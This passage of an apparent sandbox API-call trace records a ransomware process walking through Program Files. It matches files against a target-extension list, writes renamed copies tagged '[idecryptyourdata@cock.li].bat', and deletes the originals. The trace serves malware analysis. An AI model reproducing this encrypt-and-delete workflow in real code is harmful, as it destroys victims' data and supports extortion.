Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.682] lstrlenW (lpString=".1cd") returned 4 [0056.682] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 68 [0056.682] lstrlenW (lpString=".jpg") returned 4 [0056.682] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0056.682] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0056.682] lstrlenW (lpString="Garden.jpg") returned 10 [0056.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0056.683] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=23871) returned 1 [0056.683] CloseHandle (hObject=0x340) returned 1 [0056.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0056.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.683] lstrlenW (lpString=".doc") returned 4 [0056.683] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.683] lstrlenW (lpString=".docx") returned 5 [0056.683] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0056.683] lstrlenW (lpString=".pdf") returned 4 [0056.683] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.683] lstrlenW (lpString=".xls") returned 4 [0056.683] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.683] lstrlenW (lpString=".xlsx") returned 5 [0056.683] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0056.683] lstrlenW (lpString=".ppt") returned 4 [0056.683] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.684] lstrlenW (lpString=".zip") returned 4 [0056.684] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.684] lstrlenW (lpString=".rar") returned 4 [0056.684] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.684] lstrlenW (lpString=".bz2") returned 4 [0056.684] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.684] lstrlenW (lpString=".7z") returned 3 [0056.684] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.684] lstrlenW (lpString=".dbf") returned 4 [0056.684] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.684] lstrlenW (lpString=".1cd") returned 4 [0056.684] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.684] lstrlenW (lpString=".jpg") returned 4 [0056.684] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.684] lstrlenW (lpString=".doc") returned 4 [0056.684] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.684] lstrlenW (lpString=".docx") returned 5 [0056.684] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0056.684] lstrlenW (lpString=".pdf") returned 4 [0056.684] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.684] lstrlenW (lpString=".xls") returned 4 [0056.684] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.684] lstrlenW (lpString=".xlsx") returned 5 [0056.684] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0056.684] lstrlenW (lpString=".ppt") returned 4 [0056.685] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.685] lstrlenW (lpString=".zip") returned 4 [0056.685] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.685] lstrlenW (lpString=".rar") returned 4 [0056.685] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.685] lstrlenW (lpString=".bz2") returned 4 [0056.685] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.685] lstrlenW (lpString=".7z") returned 3 [0056.685] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.685] lstrlenW (lpString=".dbf") returned 4 [0056.685] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.685] lstrlenW (lpString=".1cd") returned 4 [0056.685] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0056.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0056.685] lstrlenW (lpString=".jpg") returned 4 [0056.685] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0056.685] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0056.685] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0056.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0056.746] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=6406) returned 1 [0056.746] CloseHandle (hObject=0x308) returned 1 [0056.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0056.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0056.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0056.746] lstrlenW (lpString=".doc") returned 4 [0056.746] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0056.746] lstrlenW (lpString=".docx") returned 5 [0056.746] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0056.746] lstrlenW (lpString=".pdf") returned 4 [0056.746] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0056.746] lstrlenW (lpString=".xls") returned 4 [0056.746] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0056.746] lstrlenW (lpString=".xlsx") returned 5 [0056.746] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0056.746] lstrlenW (lpString=".ppt") returned 4 [0056.746] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0056.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0056.746] lstrlenW (lpString=".zip") returned 4 [0056.746] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0056.746] lstrlenW (lpString=".rar") returned 4 [0056.746] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0056.747] lstrlenW (lpString=".bz2") returned 4 [0056.747] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0056.747] lstrlenW (lpString=".7z") returned 3 [0056.747] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0056.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0056.747] lstrlenW (lpString=".dbf") returned 4 [0056.747] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0056.906] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.906] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.906] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0056.910] GetLastError () returned 0x0 [0056.910] ReadFile (in: hFile=0x2e4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x374c, lpOverlapped=0x0) returned 1 [0056.968] WriteFile (in: hFile=0x348, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3750, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3750, lpOverlapped=0x0) returned 1 [0056.969] ReadFile (in: hFile=0x2e4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.969] WriteFile (in: hFile=0x348, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xea, lpOverlapped=0x0) returned 1 [0056.970] SetEndOfFile (hFile=0x348) returned 1 [0056.970] CloseHandle (hObject=0x348) returned 1 [0056.971] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.971] SetEndOfFile (hFile=0x2e4) returned 1 [0056.973] CloseHandle (hObject=0x2e4) returned 1 [0056.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.973] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip")) returned 1 [0056.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0056.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0056.974] lstrlenW (lpString=".doc") returned 4 [0056.974] lstrcmpiW (lpString1=".doc", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString=".docx") returned 5 [0056.974] lstrcmpiW (lpString1=".docx", lpString2="t.zip") returned -1 [0056.974] lstrlenW (lpString=".pdf") returned 4 [0056.974] lstrcmpiW (lpString1=".pdf", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString=".xls") returned 4 [0056.974] lstrcmpiW (lpString1=".xls", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString=".xlsx") returned 5 [0056.974] lstrcmpiW (lpString1=".xlsx", lpString2="t.zip") returned -1 [0056.974] lstrlenW (lpString=".ppt") returned 4 [0056.974] lstrcmpiW (lpString1=".ppt", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0056.974] lstrlenW (lpString=".zip") returned 4 [0056.974] lstrcmpiW (lpString1=".zip", lpString2=".zip") returned 0 [0056.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0056.974] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0056.974] lstrlenW (lpString=".doc") returned 4 [0056.974] lstrcmpiW (lpString1=".doc", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString=".docx") returned 5 [0056.974] lstrcmpiW (lpString1=".docx", lpString2="t.zip") returned -1 [0056.974] lstrlenW (lpString=".pdf") returned 4 [0056.974] lstrcmpiW (lpString1=".pdf", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString=".xls") returned 4 [0056.974] lstrcmpiW (lpString1=".xls", lpString2=".zip") returned -1 [0056.974] lstrlenW (lpString=".xlsx") returned 5 [0056.975] lstrcmpiW (lpString1=".xlsx", lpString2="t.zip") returned -1 [0056.975] lstrlenW (lpString=".ppt") returned 4 [0056.975] lstrcmpiW (lpString1=".ppt", lpString2=".zip") returned -1 [0056.975] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0056.975] lstrlenW (lpString=".zip") returned 4 [0056.975] lstrcmpiW (lpString1=".zip", lpString2=".zip") returned 0 [0056.975] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.975] lstrlenW (lpString="win32_LinkNoDrop32x32.gif") returned 25 [0056.975] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.975] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=153) returned 1 [0056.975] CloseHandle (hObject=0x2e4) returned 1 [0056.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif")) returned 0x20 [0056.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.976] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.976] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.976] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.976] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0056.976] GetLastError () returned 0x0 [0056.976] ReadFile (in: hFile=0x2e4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x99, lpOverlapped=0x0) returned 1 [0056.977] WriteFile (in: hFile=0x348, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xa0, lpOverlapped=0x0) returned 1 [0056.978] ReadFile (in: hFile=0x2e4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.978] WriteFile (in: hFile=0x348, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x106, lpOverlapped=0x0) returned 1 [0056.978] SetEndOfFile (hFile=0x348) returned 1 [0056.979] CloseHandle (hObject=0x348) returned 1 [0056.979] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.979] SetEndOfFile (hFile=0x2e4) returned 1 [0056.980] CloseHandle (hObject=0x2e4) returned 1 [0056.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.980] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif")) returned 1 [0056.981] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.981] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.981] lstrlenW (lpString=".doc") returned 4 [0056.981] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.981] lstrlenW (lpString=".docx") returned 5 [0056.981] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.981] lstrlenW (lpString=".pdf") returned 4 [0056.981] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.981] lstrlenW (lpString=".xls") returned 4 [0056.981] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.981] lstrlenW (lpString=".xlsx") returned 5 [0056.981] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.981] lstrlenW (lpString=".ppt") returned 4 [0056.981] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.981] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.981] lstrlenW (lpString=".zip") returned 4 [0056.981] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.981] lstrlenW (lpString=".rar") returned 4 [0056.981] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.981] lstrlenW (lpString=".bz2") returned 4 [0056.981] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.981] lstrlenW (lpString=".7z") returned 3 [0056.981] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.981] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.981] lstrlenW (lpString=".dbf") returned 4 [0056.981] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.981] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.981] lstrlenW (lpString=".1cd") returned 4 [0056.981] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.982] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.982] lstrlenW (lpString=".jpg") returned 4 [0056.982] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.982] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.982] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.982] lstrlenW (lpString=".doc") returned 4 [0056.982] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.982] lstrlenW (lpString=".docx") returned 5 [0056.982] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.982] lstrlenW (lpString=".pdf") returned 4 [0056.982] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.982] lstrlenW (lpString=".xls") returned 4 [0056.982] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.982] lstrlenW (lpString=".xlsx") returned 5 [0056.982] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.982] lstrlenW (lpString=".ppt") returned 4 [0056.982] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.982] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.982] lstrlenW (lpString=".zip") returned 4 [0056.982] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.982] lstrlenW (lpString=".rar") returned 4 [0056.982] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.983] lstrlenW (lpString=".bz2") returned 4 [0056.983] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.983] lstrlenW (lpString=".7z") returned 3 [0056.983] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.983] lstrlenW (lpString=".dbf") returned 4 [0056.983] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.983] lstrlenW (lpString=".1cd") returned 4 [0056.983] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0056.983] lstrlenW (lpString=".jpg") returned 4 [0056.983] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.983] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.983] lstrlenW (lpString="win32_MoveDrop32x32.gif") returned 23 [0056.983] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.003] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=147) returned 1 [0057.003] CloseHandle (hObject=0x354) returned 1 [0057.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif")) returned 0x20 [0057.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.004] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.004] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.005] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.005] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0057.008] GetLastError () returned 0x0 [0057.008] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x93, lpOverlapped=0x0) returned 1 [0057.009] WriteFile (in: hFile=0x348, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xa0, lpOverlapped=0x0) returned 1 [0057.010] ReadFile (in: hFile=0x358, 